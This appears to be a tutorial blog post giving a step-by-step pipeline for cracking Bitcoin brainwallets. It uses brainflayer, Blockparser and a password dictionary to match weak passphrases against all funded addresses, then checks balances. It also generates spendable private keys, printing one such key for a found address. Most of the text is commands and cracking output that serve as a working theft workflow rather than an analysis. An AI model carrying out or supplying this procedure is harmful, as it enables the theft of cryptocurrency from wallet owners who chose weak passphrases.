Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets

New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

You need a lot of RAM for this process. 64GB are recommended.
allBalances.txt has too much information. We only need bitcoin address. Use awk to filter allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to convert text file. (find the script in the comments below)

5. Convert Hash160 address to bloom filter address using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese character

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Convert to bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,
Brainwallet password is 1satoshi

9. Bitcoin wallet balance
check Bitcoin balance on Blockchain.info

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY